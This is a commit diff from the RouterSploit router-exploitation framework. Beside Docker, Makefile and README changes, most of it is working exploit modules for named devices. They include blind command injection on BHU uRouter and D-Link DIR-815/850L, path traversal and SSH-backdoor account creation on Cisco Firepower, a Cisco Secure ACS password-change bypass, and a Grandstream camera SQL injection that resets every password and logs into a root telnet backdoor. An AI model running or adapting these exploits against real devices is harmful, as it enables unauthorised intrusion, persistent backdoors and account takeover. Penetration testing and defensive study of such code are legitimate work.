Skip to content

R
routersploit
Commit 8a01c26b by BigNerd95
Options

Merge remote-tracking branch 'reverse-shell/master'

parents 3f41dc4d c42a0c69
Showing with 1786 additions and 124 deletions
Dockerfile 0 → 100644
FROM python:2.7
WORKDIR /routersploit
RUN git clone https://github.com/reverse-shell/routersploit/ .
RUN pip install -r requirements.txt
CMD ["python", "rsf.py"]
\ No newline at end of file
Makefile
# Makefile that aggregates common chores before commit
.PHONY: all clean lint lint-modules test build update run help
MODULE=''
all: lint test
......@@ -18,6 +20,15 @@ lint-modules:
test: clean
./run_tests.sh $(MODULE)
build:
docker build -t routersploit:latest -f Dockerfile .
update:
./run_docker.sh git pull
run:
./run_docker.sh
help:
@echo " clean"
@echo " Remove python artifacts."
......
README.md
......@@ -12,7 +12,7 @@ It consists of various modules that aids penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if target is vulnerable to any exploit
- scanners - modules that check if a target is vulnerable to any exploit
# Installation
......@@ -29,7 +29,7 @@ It consists of various modules that aids penetration testing operations:
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
## Installation on Ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git
......@@ -46,16 +46,23 @@ It consists of various modules that aids penetration testing operations:
sudo pip install -r requirements.txt
./rsf.py
## Running on Docker
git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh
# Update
Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull
# Usage
root@kalidev:~/git/routersploit# ./rsf.py
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
......@@ -69,7 +76,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
Codename : Wildest Dreams
Version : 1.0.0
rsf >
rsf >
## 1. Exploits
......@@ -78,7 +85,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
rsf (D-LINK DIR-300 & DIR-600 RCE) >
You can use the tab key for completion.
......@@ -103,7 +110,7 @@ Set options:
### Run module
Exploiting target can be achieved by issuing 'run' or 'exploit' command:
You can exploit the target by issuing the 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
......@@ -145,9 +152,9 @@ Display information about exploit:
### Pick module
Modules located under creds/ directory allow running dictionary attacks against various network services.
Modules located in the `creds/` directory allow running dictionary attacks against various network services.
Following services are currently supported:
The following services are currently supported:
- ftp
- ssh
......@@ -158,8 +165,8 @@ Following services are currently supported:
Every service has been divided into two modules:
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
Console:
......@@ -167,22 +174,22 @@ Console:
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
### Options
rsf (SSH Default Creds) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IP address
port 22 Target port
Module options:
Name Current settings Description
---- ---------------- -----------
threads 8 Numbers of threads
......@@ -213,21 +220,21 @@ Set target:
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
## 3. Scanners
Scanners allow quickly verify if the target is vulnerable to any exploits.
Scanners allow you to quickly verify if the target is vulnerable to any exploits.
### Pick module
......@@ -238,7 +245,7 @@ Scanners allow quickly verify if the target is vulnerable to any exploits.
### Options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
......@@ -259,11 +266,11 @@ Set target:
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
......@@ -272,7 +279,7 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Parameter Value
--------- -----
get_wps_enable 0
......@@ -285,9 +292,8 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
# License
License has been taken from BSD licensing and applied to RouterSploit Framework.
Please see LICENSE for more details.
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
routersploit/interpreter.py
......@@ -159,6 +159,7 @@ class RoutersploitInterpreter(BaseInterpreter):
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit"""
module_help = """Module commands:
......@@ -180,7 +181,7 @@ class RoutersploitInterpreter(BaseInterpreter):
self.prompt_hostname = 'rsf'
self.show_sub_commands = ('info', 'options', 'devices', 'all', 'creds', 'exploits', 'scanners')
self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show '])
self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show ', 'search '])
self.module_commands = ['run', 'back', 'set ', 'setg ', 'check']
self.module_commands.extend(self.global_commands)
self.module_commands.sort()
......@@ -456,5 +457,19 @@ class RoutersploitInterpreter(BaseInterpreter):
def command_exec(self, *args, **kwargs):
os.system(args[0])
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
utils.print_error("Please specify search keyword. e.g. 'search cisco'")
return
for module in self.modules:
if keyword in module:
module = utils.humanize_path(module)
utils.print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword))
)
def command_exit(self, *args, **kwargs):
raise EOFError
routersploit/modules/creds/ftp_bruteforce.py
......@@ -56,7 +56,7 @@ class Exploit(exploits.Exploit):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
......@@ -105,7 +105,7 @@ class Exploit(exploits.Exploit):
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
......
routersploit/modules/creds/ftp_default.py
......@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
......
routersploit/modules/creds/http_basic_bruteforce.py
......@@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
......
routersploit/modules/creds/http_basic_default.py
......@@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
......
routersploit/modules/exploits/2wire/4011g_5012nv_path_traversal.py
......@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}
response = http_request(method="POST", url=url, headers=headers, data=data)
......@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd",
"__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
"__ENH_SUBMIT_VALUE_SHOW__": "",
"__ENH_ERROR_REDIRECT_PATH__": "",
"username": "tech"}
response = http_request(method="POST", url=url, headers=headers, data=data)
......
routersploit/modules/exploits/3com/officeconnect_rce.py
......@@ -3,11 +3,11 @@ from routersploit import (
print_success,
print_status,
print_error,
print_info,
http_request,
mute,
validators,
random_text,
shell
)
......@@ -40,27 +40,15 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
self.command_loop()
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
if cmd in ['exit', 'quit']:
return
print_info(self.execute(cmd))
def execute(self, cmd):
url = "{}:{}/utility.cgi?testType=1&IP=aaa || {}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
http_request(method="GET", url=url)
return ""
@mute
def check(self):
......
routersploit/modules/exploits/asmax/ar_804_gu_rce.py
......@@ -6,6 +6,7 @@ from routersploit import (
http_request,
mute,
validators,
shell
)
......@@ -38,19 +39,10 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
if cmd in ['exit', 'quit']:
return
print self.execute(cmd)
def execute(self, cmd):
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
......
routersploit/modules/exploits/belkin/n750_rce.py
......@@ -7,6 +7,7 @@ from routersploit import (
http_request,
mute,
validators,
shell
)
......@@ -36,22 +37,13 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() is True:
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
if cmd in ['exit', 'quit']:
return
print self.execute(cmd)
def execute(self, cmd):
url = "{}:{}/login.cgi.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
......@@ -71,6 +63,6 @@ class Exploit(exploits.Exploit):
response = self.execute(cmd)
if mark in response:
return True # target vulnerable
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/bhu/bhu_urouter_rce.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
validators,
shell,
mute,
)
class Exploit(exploits.Exploit):
"""Exploit implementation for unauthenticated RCE vulnerability on BHU uRouter."""
__info__ = {
'name': 'BHU uRouter RCE',
'authors': [
'Tao "depierre" Sauvage',
],
'description': 'Module exploits BHU uRouter unauthenticated remote code execution vulnerability, which '
'allows executing commands on the router with root privileges.',
'references': [
'http://www.ioactive.com/pdfs/BHU-WiFi_uRouter-Security_Advisory_Final081716.pdf',
],
'devices': [
'BHU uRouter',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.62.1', validators=validators.url)
port = exploits.Option(80, 'Target port')
def run(self):
if self.check():
print_success('Target is vulnerable')
print_status('Blind command injection - response is not available')
print_status('Possible extraction point:')
print_status('\t- Inject "CMD &gt; /usr/share/www/routersploit.check"')
print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
shell(self, architecture='mips')
else:
print_error('Target is not vulnerable')
def execute(self, cmd):
url = u'{}:{}/cgi-bin/cgiSrv.cgi'.format(self.target, self.port)
headers = {u'Content-Type': u'text/xml', u'X-Requested-With': u'XMLHttpRequest'}
data = u'<cmd><ITEM cmd="traceroute" addr="$({})" /></cmd>'.format(cmd)
http_request(method=u'POST', url=url, headers=headers, data=data)
return '' # Blind RCE so no response available
@mute
def check(self):
url = u'{}:{}/cgi-bin/cgiSrv.cgi'.format(self.target, self.port)
headers = {u'Content-Type': u'text/xml', u'X-Requested-With': u'XMLHttpRequest'}
data = u'<cmd><ITEM cmd="traceroute" addr="$({})" /></cmd>'
# Blind unauth RCE so we first create a file in the www-root directory
cmd_echo = data.format(u'echo &quot;$USER&quot; &gt; /usr/share/www/routersploit.check')
response = http_request(method=u'POST', url=url, headers=headers, data=cmd_echo)
if not response or u'status="doing"' not in response.text:
return False
# Second we check that the file was successfully created
url = u'{}:{}/routersploit.check'.format(self.target, self.port)
response = http_request(method=u'GET', url=url)
if not response.status_code == 200 or u'root' not in response.text:
return False
# Third we clean up the temp file. No need to check if successful since we already check that the device was
# vulnerable at this point.
cmd_rm = data.format(u'rm -f /usr/share/www/routersploit.check')
http_request(method=u'POST', url=url, headers=headers, data=cmd_rm)
return True
routersploit/modules/exploits/cisco/firepower_management60_path_traversal.py 0 → 100644
import requests
from routersploit import (
exploits,
print_success,
print_status,
print_error,
print_info,
mute,
validators,
http_request,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Cisco Firepower Management 6.0 Path Traversal vulnerability.
If the target is vulnerable, it is possible to retrieve content of the arbitrary files.
"""
__info__ = {
'name': 'Cisco Firepower Management 6.0 Path Traversal',
'description': 'Module exploits Cisco Firepower Management 6.0 Path Traversal vulnerability.'
'If the target is vulnerable, it is possible to retrieve content of the arbitrary files.',
'authors': [
'Matt', # vulnerability discovery
'sinn3r', # Metasploit module
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6435',
'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking',
],
'devices': [
'Cisco Firepower Management Console 6.0'
],
}
target = exploits.Option('', 'Target IP address', validators=validators.url)
port = exploits.Option(443, 'Target Port')
path = exploits.Option('/etc/passwd', 'File to read through vulnerability')
username = exploits.Option('admin', 'Default username to log in')
password = exploits.Option('Admin123', 'Default password to log in')
session = None
def run(self):
self.session = requests.Session()
if self.check():
print_success("Target seems to be vulnerable")
print_status("Trying to authenticate")
if self.login():
file_path = "../../..{}".format(self.path)
url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(self.target, self.port, file_path)
print_status("Requesting: {}".format(file_path))
response = http_request(method="GET", url=url, session=self.session)
if response is None:
print_error("Exploit failed")
return
print_status("Reading response...")
if not len(response.text) or "empty or is not available to view" in response.text:
print_error("Exploit failed. Empty response.")
else:
print_info(response.text)
else:
print_error("Exploit failed. Could not authenticate.")
else:
print_error("Exploit failed. Target seems to be not vulnerable.")
@mute
def check(self):
url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and "6.0.1" in response.content:
return True # target is vulnerable
return False # target is not vulnerable
def login(self):
url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)
data = {"username": self.username,
"password": self.password,
"target": ""}
response = http_request(method="POST", url=url, data=data, allow_redirects=False, timeout=30, session=self.session)
if response is None:
return False
if response.status_code == 302 and "CGISESSID" in response.cookies.get_dict().keys():
print_status("CGI Session ID: {}".format(response.cookies.get_dict()['CGISESSID']))
print_success("Authenticated as {}:{}".format(self.username, self.password))
return True
return False
routersploit/modules/exploits/cisco/firepower_management60_rce.py 0 → 100644
import requests
import paramiko
import re
from routersploit import (
exploits,
print_success,
print_status,
print_error,
mute,
validators,
http_request,
random_text,
ssh_interactive
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Cisco Firepower Management 6.0 Remote Code Execution vulnerability.
If the target is vulnerable, it is possible to retrieve content of the arbitrary files.
"""
__info__ = {
'name': 'Cisco Firepower Management 6.0 RCE',
'description': 'Module exploits Cisco Firepower Management 6.0 Remote Code Execution vulnerability.'
'If the target is vulnerable, it is create backdoor account and authenticate through SSH service.',
'authors': [
'Matt', # vulnerability discovery
'sinn3r', # Metasploit module
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6433',
'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking',
],
'devices': [
'Cisco Firepower Management Console 6.0'
],
}
target = exploits.Option('', 'Target IP address', validators=validators.url)
port = exploits.Option(443, 'Target Port')
username = exploits.Option('admin', 'Default username to log in')
password = exploits.Option('Admin123', 'Default password to log in')
newusername = exploits.Option('', 'New backdoor username (Default: Random')
newpassword = exploits.Option('', 'New backdoor password (Default: Random')
session = None
def run(self):
self.session = requests.Session()
if self.check():
print_success("Target seems to be vulnerable")
if self.login():
if not self.newusername:
self.newusername = random_text(8)
if not self.newpassword:
self.newpassword = random_text(8)
self.create_ssh_backdoor(self.newusername, self.newpassword)
# Log into the SSH backdoor account
self.init_ssh_session(self.newusername, self.newpassword)
else:
print_error("Exploit failed. Could not log in")
else:
print_error("Exploit failed. Target seems to be not vulnerable.")
@mute
def check(self):
url = "{}:{}/img/favicon.png?v=6.0.1-1213".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, 22, timeout=5, username=random_text(8), password=random_text(8))
except paramiko.AuthenticationException:
return True # target is vulnerable
except:
pass
return False # target is not vulnerable
def login(self):
url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)
data = {"username": self.username,
"password": self.password,
"target": ""}
print_status("Trying to authenticate")
response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session)
if response is None:
return False
if response.status_code == 302 and "CGISESSID" in response.cookies.keys():
print_status("CGI Session ID: {}".format(response.cookies['CGISESSID']))
print_success("Authenticated as {}:{}".format(self.username, self.password))
return True
print_error("Exploit failed. Could not authenticate.")
return False
def create_ssh_backdoor(self, username, password):
url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format(self.target, self.port)
sh_name = 'exploit.sh'
sf_action_id = self.get_sf_action_id()
payload = "sudo useradd -g ldapgroup -p `openssl passwd -1 {}` {}; rm /var/sf/SRU/{}".format(password, username, sh_name)
print_status("Attempting to create SSH backdoor")
multipart_form_data = {"action_submit": (None, "Import"),
"source": (None, "file"),
"manual_update": (None, "1"),
"sf_action_id": (None, sf_action_id),
"file": (sh_name, payload)}
try:
http_request(method="POST", url=url, files=multipart_form_data, session=self.session)
except:
pass
return
def get_sf_action_id(self):
print_status("Attempting to obtain sf_action_id from rulesimport.cgi")
url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url, session=self.session)
if response is None:
return None
res = re.findall("sf_action_id = '(.+)';", response.text)
if len(res) > 1:
print_status("Found sf_action_id: {}".format(res[1]))
return res[1]
return None
def init_ssh_session(self, username, password):
print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, 22, timeout=5, username=username, password=password)
except:
ssh.close()
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
routersploit/modules/exploits/cisco/secure_acs_bypass.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_status,
print_error,
mute,
validators,
http_request,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Cisco Secure ACS Unauthorized Password Change vulnerability.
If the target is vulnerable, it is possible to change user's password.
"""
__info__ = {
'name': 'Cisco Secure ACS Unauthorized Password Change',
'description': 'Module exploits an authentication bypass issue which allows arbitrary'
'password change requests to be issued for any user in the local store.'
'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well'
'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.',
'authors': [
'Jason Kratzer <pyoor[at]flinkd.org>', # vulnerability discovery & metasploit module
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html',
],
'devices': [
'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed',
'Cisco Secure ACS version 5.2 without any patches installed',
'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed'
],
}
target = exploits.Option('', 'Target IP address', validators=validators.url)
port = exploits.Option(443, 'Target Port')
path = exploits.Option('/PI/services/UCP/', 'Path to UCP WebService')
username = exploits.Option('', 'Username to use')
password = exploits.Option('', 'Password to use')
def run(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
headers = {'SOAPAction': '"changeUserPass"'}
data = ('<?xml version="1.0" encoding="utf-8"?>' + '\r\n'
'<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
'xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
'xmlns:xsd="http://www.w3.org/1999/XMLSchema">' + '\r\n'
'<SOAP-ENV:Body>' + '\r\n'
'<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + '\r\n'
'<v1 xsi:type="xsd:string">' + self.username + '</v1>' + '\r\n'
'<v2 xsi:type="xsd:string">fakepassword</v2>' + '\r\n'
'<v3 xsi:type="xsd:string">' + self.password + '</v3>' + '\r\n'
'</ns1:changeUserPass>'
'</SOAP-ENV:Body>' + '\r\n'
'</SOAP-ENV:Envelope>' + '\r\n\r\n')
print_status("Issuing password change request for: " + self.username)
response = http_request(method="POST", url=url, data=data, headers=headers)
if response is None:
print_error("Exploit failed. Target seems to be not vulnerable.")
return
if "success" in response.text:
print_success("Success! Password for {} has been changed to {}".format(self.username, self.password))
elif "Password has already been used" in response.text:
print_error("Failed! The supplied password has already been used.")
print_error("Please change the password and try again.")
elif "Invalid credentials for user" in response.text:
print_error("Failed! Username does not exist or target is not vulnerable.")
print_error("Please change the username and try again.")
else:
print_error("Failed! An unknown error has occurred.")
@mute
def check(self):
# it is not possible to verify if target is vulnerable without exploiting system
return None
routersploit/modules/exploits/cisco/ucm_info_disclosure.py
......@@ -7,6 +7,7 @@ from routersploit import (
print_error,
print_info,
mute,
validators,
)
......@@ -32,7 +33,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address', validators=validators.address)
payload = "\x00\x01" + "SPDefault.cnf.xml" + "\x00" + "netascii" + "\x00"
......
routersploit/modules/exploits/dlink/dir_815_850l_rce.py 0 → 100644
import socket
from routersploit import (
exploits,
print_status,
mute,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on the device.
"""
__info__ = {
'name': 'D-Link DIR-815 & DIR-850L RCE',
'description': 'Module exploits D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Samuel Huntley', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38715/',
],
'devices': [
'D-Link DIR-815',
'D-Link DIR-850L',
]
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')
def run(self):
print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n'
'HOST:' + self.target + ':1900\r\n'
'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
'MX:2\r\n'
'MAN:"ssdp:discover"\r\n\r\n')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.target, 1900))
s.send(buf)
s.close()
return ""
@mute
def check(self):
return None # it is not possible to check if target is vulnerable without exploiting it
routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py 0 → 100644
import telnetlib
from routersploit import (
exploits,
mute,
print_error,
print_success,
)
class Exploit(exploits.Exploit):
__info__ = {
'name': 'Grandsteam GXV3611_HD - SQL Injection',
'description': 'Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. '
'After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it',
'authors': [
'pizza1337', # exploit author
'Joshua Abraham', # routesploit module
],
'references': [
'https://www.exploit-db.com/exploits/40441/',
'http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html',
],
'devices': [
'Grandstream GXV3611_HD',
],
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address
port = exploits.Option(23, 'Target port') # default port
def run(self):
if self.check():
print_success("Target appears to be vulnerable...")
try:
conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") # Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell")
except Exception:
print_error("Exploit failed. Could not log in.")
try:
conn = telnetlib.Telnet(self.target, 20000)
conn.read_until("login: ")
conn.write("root\r\n")
conn.read_until("Password: ")
conn.write("\r\n")
conn.read_until("# ")
print_success("Authenticaiton Successful")
conn.interact()
except Exception:
print_error("Failed to log into backdoor.")
else:
print_error("Exploit failed. Target does not appear vulnerable")
@mute
def check(self):
try:
conn = telnetlib.Telnet(self.target, self.port)
return 'Grandstream' in conn.read_until("login:")
except Exception:
return False
routersploit/modules/exploits/huawei/hg520_info_dislosure.py
......@@ -7,6 +7,7 @@ from routersploit import (
print_success,
print_info,
mute,
validators,
)
......@@ -30,7 +31,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address') # target address
target = exploits.Option('', 'Target IP address', validators=validators.address) # target address
payload = ("\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00"
"\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00"
......
routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
mute,
validators,
http_request,
print_info,
print_success,
print_error,
)
class Exploit(exploits.Exploit):
"""
Exploit Linksys SMART WiFi firmware
If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
"""
__info__ = {
'name': 'Linksys SMART WiFi Password Disclosure',
'authors': [
'Sijmen Ruwhof', # vulnerability discovery
'0BuRner', # routersploit module
],
'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
'references': [
'https://www.kb.cert.org/vuls/id/447516',
'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243',
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243',
],
'devices': [
'Linksys EA2700 < Ver.1.1.40 (Build 162751)',
'Linksys EA3500 < Ver.1.1.40 (Build 162464)',
'Linksys E4200v2 < Ver.2.1.41 (Build 162351)',
'Linksys EA4500 < Ver.2.1.41 (Build 162351)',
'Linksys EA6200 < Ver.1.1.41 (Build 162599)',
'Linksys EA6300 < Ver.1.1.40 (Build 160989)',
'Linksys EA6400 < Ver.1.1.40 (Build 160989)',
'Linksys EA6500 < Ver.1.1.40 (Build 160989)',
